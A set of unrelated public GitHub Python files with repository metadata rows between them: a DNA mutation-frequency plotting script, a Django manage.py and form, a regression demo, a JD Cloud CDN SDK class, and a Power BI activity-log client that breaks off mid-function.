# SAVEFIG=True, directory='20170703_s4s10_analysis/')
##############################
#calculate mutation counts
try: freq_ctrl = mutation_types(Mctrlnorm,x1=sumX1X2[0],x2=sumX1X2[1])
except: print('fail ctrl mutation types')
try: freq_sample = mutation_types(Msamplenorm,x1=sumX1X2[0],x2=sumX1X2[1])
except: print('fail ctrl mtuation types')
#print(freq_sample)
if normalize: freq_difference = freq_sample - freq_ctrl
else: freq_difference = freq_sample
##############################
#zero out any negative values; these are not logical values to be realized bc/ of the noise threshold
if nozeros: freq_difference[freq_difference<0] = 0.0
if maskCT: freq_difference[9] =0
if maskTC: freq_difference[12]=0
##############################
#calculate total mutation rate
#METHOD WHICH IGNORES BASE COMPOSITION OF SEQuENCE (each gets 1/4 of representation)
#####METHOD WHICH REFLECTS BASE COMPOSITION OF SEQUENCE... not as general
#xN1, xN2 = Mctrlnorm>.50, Msamplenorm>.50
#totalR1 = np.max(Mctrlnorm.T,axis=1)[sumX1X2[0]:sumX1X2[1]]
#totalR2 = np.max(Msamplenorm.T,axis=1)[sumX1X2[0]:sumX1X2[1]]
#if maskCT:
# totalR1 = np.max(Mctrlnorm.T,axis=1)[sumX1X2[0]:sumX1X2[1]]
#if maskTC:
#
#totalR1, totalR2 = 1-np.average(totalR1), 1-np.average(totalR2)
#
#if normalize: totalrate = totalR2 - totalR1
#else: totalrate = totalR2
totalrate = calculate_rate(freq_difference, Msamplenorm, x1=sumX1X2[0], x2=sumX1X2[1], maskCT=maskCT, maskTC=maskTC)
##############################
#Print title rate/file
name = samplename + ' | LOG rate@ ' + str('{0:.2}'.format(np.log(totalrate)/np.log(10)))
#name = samplename+' \ '+PrintRate
##############################
#Normalize the frequencies
freq_difference = M_norm(freq_difference)
#print(freq_difference)
try: plot_heatmap(mutation_values=freq_difference, circle=True, showtxt=True, title=name)
except: print('missed')
if SAVEFIG:
if maskCT: filename='noCT_'+filename
if maskTC: filename='noTC_'+filename
try: plt.savefig(str(directory + filename + '_' + str(sumX1X2[0]) + '_'
+ str(sumX1X2[1]) + '.svg'), transparent=True)
except: pass
#plt.savefig()
plt.show()
def calculate_rate(freq_difference, Mnorm, x1=750, x2=1150, maskCT=False, maskTC=False):
#we first determine how many A,T,C,Gs are in the data:
M1 = Mnorm[:,x1:x2]
counts = M_norm(np.sum(M1[[0,1,2,3],:]>.5, axis=1))
ATCGcounts = np.repeat(counts ,4)
#print(freq_difference)
if maskCT: ATCGcounts[9]=0
if maskTC: ATCGcounts[12]=0
#print(ATCGcounts)
#take the weighted average dot product
return ATCGcounts.dot(freq_difference)
#this is sample code for running a single sample to obtain a mutation footprint
if False: print("""
y=mutation_types(M1norm,x1=900,x2=1100)
y[9]=0
z = M_norm(y)
z[9]=0
print('{0:.2}'.format(np.log(sum(y))/np.log(10)))
plot_heatmap(mutation_values=z,circle=True,showtxt=True, title='ctrl')
""")
def mutation_types(Mnorm,x1=750, x2=1150, STDEV=False):
#input Mnorm, single matrix
#output: A->:A, T, C, G, T->:A, T, C, G, C->:A, T, C, G, G->:A, T, C, G array
lookup={'A':0,'T':1,'C':2,'G':3}
Mmut =np.zeros(16)
Mstd =np.zeros(16)
for i in ['A','T','C','G']:
letter = lookup[i]
#select all of letter 'N'
Msub = Mnorm[:4,x1:x2]
xN = Msub[letter,:]>.51
#take the cross-wise average of N->A, N->T, N->C, N->G
y = np.average(Msub[:,xN],axis=1)
z = np.std(Msub[:,xN],axis=1)
#print(y)
#set identity base to zero!
y[y>.51] = 0
#this yields the following like array: [.999, .0001, .01, .004, 0.00]
Mmut[letter*4:letter*4+4] = y
Mstd[letter*4:letter*4+4] = z
if STDEV:
return Mmut, Mstd
return Mmut #16x1 array
def plot_heatmap(mutation_values=np.zeros([100,5]),circle=False, showtxt=False, title=''):
#input format:
"""
0 A->A
1 A->T
2 A->C
3 A->G
4 T -A
5 -T
6 -C
7 -G
8 C..
9
10
11
12
13
14...
A->:A, T, C, G, T->:A, T, C, G, C->:A, T, C, G, G->:A, T, C, G
"""
#initial values
xy_values=np.array([[0, 0], [0, 1], [0, 2], [0, 3], [1, 0], [1, 1], [1, 2], [1, 3], [2, 0], [2, 1],
[2, 2], [2, 3], [3, 0], [3, 1], [3, 2], [3, 3]])*.2
size_rect=.2
size_radius=.098
fig = plt.figure()
ax = fig.add_subplot(111, aspect='equal')
plt.axis('off')
ax.text(.4, .9, title, verticalalignment='center', horizontalalignment='center')
#coloring
#norm=np.sum(mutation_values)
#mutation_values/=(norm+01.00)
#print(mutation_values)
#mutation values
norm = colors.Normalize(vmin=np.min(mutation_values), vmax=np.max(mutation_values))
max_mv=np.max(mutation_values)
for i, xy in enumerate(xy_values):
mv=mutation_values[i]
##NEED TO SET COLOR VALUES HERE
#Cvalue=[mutation_values[i]*2,1,mutation_values[i]*2]
Cvalue=[1-norm(mv)*.5, 1-norm(mv)*.95-.05,1-norm(mv)*.95-.05]
if circle == False:
ax.add_patch(
patches.Rectangle(xy, size_rect, size_rect, color=Cvalue)
)
else:
try: r=np.sqrt(mutation_values[i]/max_mv)
except: r=0
ax.add_patch(
patches.Circle(xy+.1, size_radius*r , color=Cvalue)
#RADIUS is proporation to the mutation_value[i], scaled by max_mv ~ allowing the maximum circle to fill
#a box... the scaler doesn't matter, as it stays constant in a given graph.
)
#ax.add_patch(patches.Rectangle(xy, size_rect, size_rect, fill=False, lw=.2))
if showtxt: #and mv <= 0:
nump = '{0:.0%}'.format(max(mv,0))
ax.text(xy[0]+.105,xy[1]+.1, nump ,verticalalignment='center', horizontalalignment='center')
#ax.get_xaxis().set_visible(False)
#ax.get_yaxis().set_visible(False)
#########################PLOTTING A TABLE FOR EACH MUTATION RATE
def table_output(Mnormlist, row_labels=[], subtract_zero=False, zero=[], x1=1170, x2=1270, rows=[]):
#rows = row_labels
if len(rows)==0: rows = ('wtT7-KO', 'pA154', 'APN1-KO', 'APN2-SHL', 'CIP1-KO', 'REV3-SHL', 'REV7-SHL',
'479/82/149int', 'g479', 'g480', 'g481', 'g482', 'g79/80/81', 'g63/66/69', 'wt-ctrl',
'wtT7-KO', 'pA152', 'pA153','pA158', 'pA159', 'polK', 'UDGmut', '79/82+148int', '79/82+681', '79/81+716')
#are we going to execute the zero subtraction?? if so that will be the first matrix Mnormlist[0]
normalize = subtract_zero
if subtract_zero: baseline = np.round( mutation_types(zero, x1=x1, x2=x2) * 1E3, 3 )
#############################################################
#COMPUTE THE MUTATION TYPE FREQUENCIES and APPEND TO A MATRIX
MUT = np.zeros((len(Mnormlist), 16))
for i, norm in enumerate(Mnormlist):
#calculate mutation types and round to 3rd decimnal place x10E3
if normalize: MUT[i] = np.round( mutation_types(norm, x1=x1, x2=x2) * 1E3, 3 ) - baseline
else: MUT[i] = np.round( mutation_types(norm, x1=x1, x2=x2) * 1E3, 3 )
if normalize: MUT[i][MUT[i]<0] = 0
#
#print( str(i+1) + ': ' + str(MUT[i]))
#####################
#MAKE THE COLUMN PLOT
normal = MUT/np.max(MUT+1E-8,axis=0)
fig, axs =plt.subplots(1)
collabel=("A:A", "A:T", "A:C", "A:G", "T:A", "T:T", "T:C", "T:G", "C:A", "C:T",
"C:C", "C:G", "G:A", "G:T", "G:C", "G:G")
rowlabel= [str(i)+": "+rows[i] for i in range(len(MUT))]
axs.axis('tight')
axs.axis('off')
the_table = axs.table(cellText=MUT,colLabels=collabel,rowLabels=rowlabel,
loc='center', cellColours=plt.cm.summer(normal))
the_table.scale(2,1)
#axs.title("Mutation frequencies for samples x 10^-3")
#plt.title('Mutation frequencies for samples x 10^-3')
plt.show()
def CurvesDots(graph1, graph2, name1='0', name2='ctrl', baseStart='A', baseEND='T', window=20, Xrange=[0,1250], machine='none', remove_out=True):
#setting the range
Xrange=Xrange
#defining the dot area!
area=.9
if machine=='miseq': Ydic={'A':{'T':[1E-6,3E-4], 'C':[1E-6,1E-4], 'G':[1E-6,6E-4]},
'T':{'A':[1E-6,2E-4], 'C':[1E-6,6E-4], 'G':[1E-6,1E-4]},
'C':{'A':[1E-6,1E-4], 'T':[1E-5,1E-1], 'G':[1E-6,1E-4]},
'G':{'A':[1E-6,5E-4], 'T':[1E-6,2E-4], 'C':[1E-6,1E-4]} }
elif machine=='hiseq': Ydic={'A':{'T':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
'T':{'A':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
'C':{'A':[1E-6,6E-4], 'T':[1E-6,1E-1], 'G':[1E-6,6E-4]},
'G':{'A':[1E-6,2E-3], 'T':[1E-6,6E-4], 'C':[1E-6,6E-4]} }
else: Ydic={'A':{'T':[3E-5,1E-3], 'C':[3E-5,2E-3], 'G':[3E-5,1E-3]},
'T':{'A':[3E-5,1E-3], 'C':[3E-5,6E-4], 'G':[3E-5,2E-3]},
'C':{'A':[3E-5,2E-3], 'T':[3E-5,1E-1], 'G':[3E-5,5E-4]},
'G':{'A':[3E-5,2E-3], 'T':[3E-5,1E-3], 'C':[3E-5,6E-4]} }
#print(baseStart, baseEnd)
Yrange=Ydic[baseStart][baseEND]
if baseStart=='C' and baseEND=='T': graphtype='log'
else: graphtype='linear'
##############################################3
lookup={'A':0,'T':1,'C':2,'G':3} #dictionar for bases
MT=graph1 #pick out which data file to use
x_T=MT[lookup[baseStart]]>.51 #
#plt.scatter(range(len(MT.T)), 1-np.max(MT.T[:,:],axis=1), s=area*2, color='green')
plt.scatter(np.arange(-window, -window+len(MT.T)), MT.T[:,lookup[baseEND]]*x_T, s=area*3, color='blue')
plt.scatter(np.arange(-window, -window+len(graph2.T)), graph2.T[:,lookup[baseEND]]*x_T[:len(graph2.T)], s=area*3, color='orange')
plot_NtoN([graph1],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
lims=False, ASScolor=True, colors=['blue', 'blue'], linewidth=2.3, remove_out= remove_out)
plot_NtoN([graph2],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
lims=False, ASScolor=True, colors=['orange', 'orange'], linewidth=2.3, remove_out= remove_out)
plt.ylim(Yrange)
plt.xlim(Xrange)
plt.title(name1 + ' // ' + name2 + ' : ' + baseStart + ' -> ' + baseEND)
#plt.yscale('log')
plt.yscale(graphtype)
return plt
def CurvesDots(graph1, graph2, name1='0', name2='ctrl', baseStart='A', baseEND='T', window=20, Xrange=[0,1250], machine='none', remove_out=True, area=.9, lines=True):
#setting the range
Xrange=Xrange
#defining the dot area!
area=area
if machine=='miseqALT': Ydic={'A':{'T':[1E-6,3E-4], 'C':[1E-6,1E-4], 'G':[1E-6,3E-4]},
'T':{'A':[1E-6,2E-4], 'C':[1E-6,4E-4], 'G':[1E-6,1E-4]},
'C':{'A':[1E-6,1E-4], 'T':[1E-5,1E-1], 'G':[1E-6,1E-4]},
'G':{'A':[1E-6,7E-4], 'T':[1E-6,2E-4], 'C':[1E-6,1E-4]} }
if machine=='miseq': Ydic={'A':{'T':[1E-6,3E-4], 'C':[1E-6,1E-4], 'G':[1E-6,6E-4]},
'T':{'A':[1E-6,2E-4], 'C':[1E-6,6E-4], 'G':[1E-6,1E-4]},
'C':{'A':[1E-6,1E-4], 'T':[1E-5,1E-1], 'G':[1E-6,1E-4]},
'G':{'A':[1E-6,5E-4], 'T':[1E-6,2E-4], 'C':[1E-6,1E-4]} }
elif machine=='hiseq': Ydic={'A':{'T':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
'T':{'A':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
'C':{'A':[1E-6,6E-4], 'T':[1E-6,1E-1], 'G':[1E-6,6E-4]},
'G':{'A':[1E-6,2E-3], 'T':[1E-6,6E-4], 'C':[1E-6,6E-4]} }
elif machine=='dots': Ydic={'A':{'T':[.5E-6,5E-4], 'C':[.5E-6,5E-4], 'G':[.5E-6,5E-4]},
'T':{'A':[.5E-6,5E-4], 'C':[.5E-6,5E-4], 'G':[.5E-6,5E-4]},
'C':{'A':[.5E-6,5E-4], 'T':[.5E-6,1E-1], 'G':[.5E-6,5E-4]},
'G':{'A':[.5E-6,2E-3], 'T':[.5E-6,5E-4], 'C':[.5E-6,5E-4]} }
else: Ydic={'A':{'T':[3E-5,1E-3], 'C':[3E-5,2E-3], 'G':[3E-5,1E-3]},
'T':{'A':[3E-5,1E-3], 'C':[3E-5,6E-4], 'G':[3E-5,2E-3]},
'C':{'A':[3E-5,2E-3], 'T':[3E-5,1E-1], 'G':[3E-5,5E-4]},
'G':{'A':[3E-5,2E-3], 'T':[3E-5,1E-3], 'C':[3E-5,6E-4]} }
#print(baseStart, baseEnd)
Yrange=Ydic[baseStart][baseEND]
if baseStart=='C' and baseEND=='T': graphtype='log'
else: graphtype='linear'
##############################################3
lookup={'A':0,'T':1,'C':2,'G':3} #dictionar for bases
MT=graph1 #pick out which data file to use
x_T=MT[lookup[baseStart]]>.51 #
#plt.scatter(range(len(MT.T)), 1-np.max(MT.T[:,:],axis=1), s=area*2, color='green')
plt.scatter(np.arange(-window, -window+len(MT.T)), MT.T[:,lookup[baseEND]]*x_T, s=area*3, color='blue')
plt.scatter(np.arange(-window, -window+len(graph2.T)), graph2.T[:,lookup[baseEND]]*x_T[:len(graph2.T)], s=area*3, color='orange')
if lines: plot_NtoN([graph1],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
lims=False, ASScolor=True, colors=['blue', 'blue'], linewidth=2.3, remove_out= remove_out)
if lines: plot_NtoN([graph2],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
lims=False, ASScolor=True, colors=['orange', 'orange'], linewidth=2.3, remove_out= remove_out)
plt.ylim(Yrange)
plt.xlim(Xrange)
plt.title(name1 + ' // ' + name2 + ' : ' + baseStart + ' -> ' + baseEND)
#plt.yscale('log')
plt.yscale(graphtype)
return plt
def return_index(M, letter='A'):
lookup={'A':0,'T':1,'C':2,'G':3}
start = lookup[letter]
xI = M[start,:] > .8
return xI
def add_means(means, stdevs):
mean = np.sum(means)
std = np.sum(stdevs**2)**(1/len(means))
return mean, std
def divide_means(mean1, mean2, std1, std2):
mean1, mean2 = np.array(mean1), np.array(mean2)
mean1[mean1==0]=1E-6
mean2[mean2==0]=1E-6
mean = mean1 / mean2
std = mean * np.sqrt( (std1/mean1)**2 + (std2/mean2)**2 )
return mean, std
def average_means(means, stdevs):
#check if there are means to be averaged
if len(means)<2: return means[0], stdevs[0]
#average the means and proper stddev error prop
mean = np.average(means)
std = np.sqrt( np.sum((means - mean)**2) / (len(means) - 1.0) )
return mean, std
def ATCG_values(MnormA1, MnormA2, MnormB1, MnormB2, Xstart=800, Xend=1100, naming=''):
#pull out mutation type information for replicate samples A1, 2 and B1, 2
m1, m2 = mutation_types(MnormA1, x1=Xstart, x2=Xend), mutation_types(MnormA2, x1=Xstart, x2=Xend)
m3, m4 = mutation_types(MnormB1, x1=Xstart, x2=Xend), mutation_types(MnormB2, x1=Xstart, x2=Xend)
#generate and average and STDEV for the 2 replicates
x1, y1 = np.average([m1, m2], axis=0), np.std([m1, m2], axis=0)
x2, y2 = np.average([m3, m4], axis=0), np.std([m3, m4], axis=0)
#divide the means to find a ratio of increase and error-prop standard deviations
x, y = divide_means(x2, x1, y2, y1)
#print(x)
#average means (A->N [1,2,3]) (T->N [4,6,7]) (C->N [8,9,11]) (C->T [9]) (C->!T [8, 11]) (G->N [12,13,14])
lookup = {"A->N":[1,2,3], "T->N":[4,6,7], "C->!T":[8,11], "C->T":[9], "G->N":[12,13,14]}
values, means, stds = {}, [], []
for i in ["A->N", "T->N", "C->!T", "C->T", "G->N"]:
z = average_means(x[lookup[i]], y[[lookup[i]]])
means.append(z[0])
stds.append(z[1])
values[i] = z
plt.barh(range(len(means))[::-1], means, .5, alpha=1, color='grey',
xerr=stds, error_kw={'ecolor': '0.0'}, label='testing',log=True)
plt.xlim([.1,100])
plt.axvline(x=1, color='black', linestyle='--')
plt.yticks(range(len(means))[::-1], ["A->N", "T->N", "C->!T", "C->T", "G->N"])
plt.xlabel('fold increase in substitution rate +pT7/-pT7')
plt.ylabel('substitution types')
plt.title('ratio of subs rates +/-pT7 / 2-replicate / bp' + str(Xstart) + '-' + str(Xend) + '/' + naming)
return values, means, stds, x, y
def runATCG(M1, M2, N1, N2, window=10, Xrange=[0,1250], savefig=False, machine='hiseq', remove_out=True, area=.9, lines=True):
plt.figure(figsize=(25,25))
k=1
for i in ['G','C','T','A']:
for j in ['A','T','C','G']:
if i != j:
#print(i,j)
plt.subplot(4,4,k)
fig = CurvesDots(M1, M2, name1=N1, name2=N2,
baseStart=j, baseEND=i, window=window, Xrange=Xrange, machine=machine, remove_out=remove_out, area=area, lines=lines)
k+=1
else: k+=1
filename=N1+'__'+N2
if savefig: plt.savefig(str('20180112_Analysis/' + filename + '.png'), transparent=False)
#plt.savefig(str(directory + filename + '_' + str(sumX1X2[0]) + '_'
# + str(sumX1X2[1]) + '.svg'), transparent=True)
def ATCG_values(MnormA1, MnormA2, MnormB1, MnormB2, Xstart=800, Xend=1100, naming=''):
#pull out mutation type information for replicate samples A1, 2 and B1, 2
m1, m2 = mutation_types(MnormA1, x1=Xstart, x2=Xend), mutation_types(MnormA2, x1=Xstart, x2=Xend)
m3, m4 = mutation_types(MnormB1, x1=Xstart, x2=Xend), mutation_types(MnormB2, x1=Xstart, x2=Xend)
#generate and average and STDEV for the 2 replicates
x1, y1 = np.average([m1, m2], axis=0), np.std([m1, m2], axis=0)
x2, y2 = np.average([m3, m4], axis=0), np.std([m3, m4], axis=0)
#divide the means to find a ratio of increase and error-prop standard deviations
x, y = divide_means(x2, x1, y2, y1)
#print(x)
#average means (A->N [1,2,3]) (T->N [4,6,7]) (C->N [8,9,11]) (C->T [9]) (C->!T [8, 11]) (G->N [12,13,14])
lookup = {"A->N":[1,2,3], "T->N":[4,6,7], "C->!T":[8,11], "C->T":[9], "G->N":[12,13,14]}
values, means, stds = {}, [], []
for i in ["A->N", "T->N", "C->!T", "C->T", "G->N"]:
z = average_means(x[lookup[i]], y[[lookup[i]]])
means.append(z[0])
stds.append(z[1])
values[i] = z
plt.bar(range(len(means)), means, .5, alpha=1, color='grey',
yerr=stds, error_kw={'ecolor': '0.0'}, label='testing',log=True)
plt.axhline(y=1, color='black', linestyle='--')
plt.xticks(range(len(means)), ["A->N", "T->N", "C->!T", "C->T", "G->N"])
plt.ylabel('fold increase in substitution rate +pT7/-pT7')
plt.xlabel('substitution types')
plt.title('ratio of subs rates +/-pT7 / 2-replicate / bp' + str(Xstart) + '-' + str(Xend) + '/' + naming)
return values, means, stds
| [
"noreply@github.com"
] | noreply@github.com |
ae9576ab2c05cb279b8cf8b8606acc8bc1c87818 | 94e55472e1cb2de6e3b7db7750481c8bc4b8f424 | /thoth/__init__.py | cd47c67a49ca76784db782a89fc2f8bc0a32c234 | [] | no_license | westurner/thoth | 0b90748fee9242a152f1fb00b61c497632a878a4 | c2a77fbb14625cae74efd7e552fba35d780a8a49 | refs/heads/master | 2020-03-07T13:54:54.209727 | 2018-03-31T09:40:01 | 2018-03-31T09:40:01 | 127,513,639 | 1 | 0 | null | 2018-03-31T09:17:06 | 2018-03-31T08:24:18 | C | UTF-8 | Python | false | false | 150 | py | # -*- coding: utf-8 -*-
"""Top-level package for Thoth."""
__author__ = """Simon DeDeo"""
__email__ = 'sdedeo@andrew.cmu.edu'
__version__ = '1.0.0'
| [
"@westurner"
] | @westurner |
b749aa6103ec81a3d2f409926a1267998cdea89e | 96403d1a134df72473e6ffb2bddac02076d7979a | /manage.py | 3a47208faa5eaf9bde95c2aef46d53a7c153a7ed | [] | no_license | rishabhjainj/giftsomeone | 7ce069878410e82d45847adf914aba55735b1c4b | 085e8777cde1bd6dfeb809099a49e576b7e4dcac | refs/heads/main | 2023-04-13T17:05:09.694286 | 2021-04-27T08:09:51 | 2021-04-27T08:09:51 | 336,269,251 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'giftSomeone.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"jrishabh252@gmail.com"
] | jrishabh252@gmail.com |
c81b66919d48cfe9c28afe654a54b9849eb02112 | 8a853e725b8e5be560505c8cbd3f6ef21b68bf42 | /rsqaured.py | 3bddbced2c023d07667fdbea486587e08d082548 | [] | no_license | zz2k16/MachineLearning | 6bc28e0ce9a8b088cb97f7936b9bf207db604a6e | 3ed023cf8a8dcd91649c784b01abd14998b5215b | refs/heads/master | 2021-01-02T09:17:26.646472 | 2017-08-22T22:48:05 | 2017-08-22T22:48:05 | 99,182,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | # learning more in depth about how to compute linear regression and using r-squared as a performance measure
# generating random but correlated data to explore the model and its features. for fun :)
import numpy as np
from pylab import *
from scipy import stats
import matplotlib.pyplot as plt
# create two sets of random data, one with normal distribution and the other a linear function of it
pagespeed = np.random.normal(3.0,1.0,1000)
# force a linear relationship using page speed
checkoutcart = 100 - (pagespeed + np.random.normal(0, 0.1, 1000) * 3)
# visualise dummy data
scatter(pagespeed, checkoutcart)
# plt.show()
# use ordinary least squares to measure the linear relationship with the scipy linear regression method
slope, intercept, r_val, p_val, std_err = stats.linregress(pagespeed, checkoutcart)
r_squared = r_val ** 2
print(r_squared)
# returns 0.916
# define function to compute slope using stored values of the linear regression model
# or simply the line of best fit, y = mx + b
def predict_slope(x):
return slope * x + intercept
# compute slope fitted to pagespeed
fit_line = predict_slope(pagespeed)
# visualise linear regression line
plt.scatter(pagespeed,checkoutcart, c='orange')
# super impose line over scatter plot in blue for contrast
plt.plot(pagespeed, fit_line, c='b')
plt.title('Linear regression Least ordinary squares')
plt.show()
| [
"FarrukhMZ@cardiff.ac.uk"
] | FarrukhMZ@cardiff.ac.uk |
d795d34961b9c42afe0703c20a4e6eeb5855f39a | 21b39d50e4df56ea01453001845d1580729af1df | /jdcloud_sdk/services/cdn/apis/SetDomainConfigRequest.py | 1e000f49f2dff6150f0a5cf3e6fc819eb5b40be3 | [
"Apache-2.0"
] | permissive | Tanc009/jdcloud-sdk-python | ef46eac7731aa8a1839b1fc1efd93249b7a977f0 | 8b045c99bc5b73ca7348e950b6f01e03a27982f5 | refs/heads/master | 2021-08-09T14:49:16.177709 | 2021-06-25T02:38:41 | 2021-06-25T02:38:41 | 141,714,695 | 0 | 0 | Apache-2.0 | 2018-07-20T13:21:17 | 2018-07-20T13:21:16 | null | UTF-8 | Python | false | false | 2,404 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class SetDomainConfigRequest(JDCloudRequest):
"""
更新域名配置
"""
def __init__(self, parameters, header=None, version="v1"):
super(SetDomainConfigRequest, self).__init__(
'/domain/{domain}/config', 'POST', header, version)
self.parameters = parameters
class SetDomainConfigParameters(object):
def __init__(self, domain, ):
"""
:param domain: 用户域名
"""
self.domain = domain
self.httpType = None
self.backSourceType = None
self.jumpType = None
self.jcdnTimeAnti = None
self.hdrCtrl = None
self.toutiaoHeader = None
def setHttpType(self, httpType):
"""
:param httpType: (Optional) http类型,只能为http或者https
"""
self.httpType = httpType
def setBackSourceType(self, backSourceType):
"""
:param backSourceType: (Optional) 回源类型
"""
self.backSourceType = backSourceType
def setJumpType(self, jumpType):
"""
:param jumpType: (Optional) 有三种类型:default、http、https
"""
self.jumpType = jumpType
def setJcdnTimeAnti(self, jcdnTimeAnti):
"""
:param jcdnTimeAnti: (Optional) dash鉴权相关配置
"""
self.jcdnTimeAnti = jcdnTimeAnti
def setHdrCtrl(self, hdrCtrl):
"""
:param hdrCtrl: (Optional) 回源鉴权相关配置
"""
self.hdrCtrl = hdrCtrl
def setToutiaoHeader(self, toutiaoHeader):
"""
:param toutiaoHeader: (Optional) 头条header配置
"""
self.toutiaoHeader = toutiaoHeader
| [
"tancong@jd.com"
] | tancong@jd.com |
6b4e9bc8b9a85aae22af3060ef2e2c72a5132795 | 1c4316feb250c309d318031becc8aa6867667637 | /providers/forms.py | db6eaf827b5aae26648ce76ab79a6d4b28af49b6 | [] | no_license | prabhatse/mozio | 625ec5007c12fb8866e55d0c6ed95558abaf3a75 | be8bd99907f7738233a47dd8e5d48647addc7137 | refs/heads/master | 2021-01-17T21:09:21.996784 | 2016-06-12T12:01:56 | 2016-06-12T12:01:56 | 60,958,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,112 | py | from django import forms
from api.provider.models import Providers as Provider
class AddProviderForm(forms.Form):
"""
Form to save/edit a Service area.
"""
name = forms.CharField(label='Provider Name', required=False)
email = forms.EmailField(label='Provider Email', required=False)
phone_no = forms.CharField(label='Provider Phone', required=False)
language = forms.CharField(label='Provider Language', required=False)
currency= forms.CharField(label='Provider Currency', required=False)
def save(self, force_insert=False, force_update=False, commit=True):
try:
obj = Provider.objects.get(name=self.data['name'],
email=self.data['email'],
phone_no=self.data['phone_no'],
language=self.data['language'],
currency=self.data['currency'])
except:
obj = Provider(name=self.data['name'],
email=self.data['email'],
phone_no=self.data['phone_no'],
language=self.data['language'],
currency=self.data['currency'])
obj.save()
| [
"p.shankar@advanskills.com"
] | p.shankar@advanskills.com |
12a3f1bf28c350a16b9e340deebf644633c7a90f | 64b874ae249fe9ed72a087cef59d7dd0efd9bf43 | /pypowerbi/activity_logs.py | fc39a1d56f150cd711f4a87b376edac3c7885097 | [
"MIT"
] | permissive | g-sun/pypowerbi | 9b55e48364c4615cae13be007d64323e6690e0a9 | c7acf7d4c63579fc1824c25f34a37c5f5ce68788 | refs/heads/master | 2023-06-25T10:47:00.496796 | 2021-07-27T02:13:24 | 2021-07-27T02:13:24 | 371,371,591 | 0 | 0 | MIT | 2021-05-27T12:49:41 | 2021-05-27T12:49:40 | null | UTF-8 | Python | false | false | 4,961 | py | # -*- coding: future_fstrings -*-
import requests
import datetime
from requests.exceptions import HTTPError
class ActivityLogs:
def __init__(self, client):
self.client = client
self.base_url = f'{self.client.api_url}/{self.client.api_version_snippet}/{self.client.api_myorg_snippet}'
self.activities_events_snippet = "activityevents"
self.group_part = "admin" # This is always admin. Not really a group, but follows the
# format of the rest of the library code
def get_activity_logs(self, st, et=None, filter=None):
"""
Get's the activity log for the specified date or date range. If et is None, it will get all logs (from midnight
to 11:59:59 UTC) for the date specified by st. If et is set, it will retrieve logs from st-et. Note that the
Power BI Activity Service currently supports only retrieving one day of logs at a time.
"filter" is a string parameter that's sent to the service to filter the types of events returned. For example,
"Activity eq 'viewreport' and UserId eq 'john@contoso.com'" gets report views for john(contoso.com).
Right now the service only supports the operators ['eq', 'and'].
NOTE: It appears that only data from December 15th, 2019 and on can be retrieved by the API as of the writing
of this code. This isn't an official limitation I've found in the documentation, but seems to be the case.
NOTE: This API allows at most 200 Requests per hour.
For a good overview of the service, see https://powerbi.microsoft.com/en-us/blog/the-power-bi-activity-log-makes-it-easy-to-download-activity-data-for-custom-usage-reporting/
:param st: The date to retrieve usage for (python datetime).
:param et: The date to retrieve usage for (python datetime).
:param filter: A string that defines a filter for retrieving the information. See the Power BI REST API
Documentation for details.
:return:
"""
# TODO: It would be nice if the available parameters for the "filter" function were defined somewhere in code.
if et is None:
dt_str = st.strftime("%Y-%m-%d")
st_dt_str = f"{dt_str}T00:00:00"
et_dt_str = f"{dt_str}T23:59:59"
else:
st_dt_str = st.strftime("%Y-%m-%dT:%H%M%S")
et_dt_str = et.strftime("%Y-%m-%dT:%H%M%S")
# https://api.powerbi.com/v1.0/myorg/admin/activityevents?startDateTime='{st_dt_str}'&endDateTime='{et_dt_str}'
# form the url
filter_snippet = f"startDateTime='{st_dt_str}'&endDateTime='{et_dt_str}'"
url = f'{self.base_url}/{self.group_part}/{self.activities_events_snippet}?{filter_snippet}'
if filter is not None:
url += f"$filter={filter}"
# form the headers
headers = self.client.auth_header
# get the response
response = requests.get(url, headers=headers)
# 200 is the only successful code, raise an exception on any other response code
if response.status_code != 200:
raise HTTPError(response, f'Get Datasets request returned http error: {response.json()}')
response_obj = response.json()
event_entities = response_obj["activityEventEntities"]
continuation_uri = response_obj["continuationUri"]
continuation_token = response_obj["continuationToken"]
activity_events = event_entities
# Even if nothing is returned, it takes around 24 tries until no continuation token is returned.
# (This is how Microsoft says the API is to be used.)
# It seems to send the first set of actual data around 12-15 calls in. This doesn't seem to change even if you
# slow down the API calls (in total number of calls required or when the first set of actual data is returned).
cont_count = 1
while continuation_token is not None:
response = requests.get(continuation_uri, headers=headers)
response_obj = response.json()
event_entities = response_obj["activityEventEntities"]
continuation_uri = response_obj["continuationUri"]
continuation_token = response_obj["continuationToken"]
activity_events.extend(event_entities)
# print(f"{cont_count}: {len(event_entities)}")
cont_count += 1
# print(f"Took {cont_count} tries to exhaust continuation token for {len(activity_events)} events.")
# Convert Datetime Strings to Python datetimes
_date_fmt_str = '%Y-%m-%dT%H:%M:%S'
for event in activity_events:
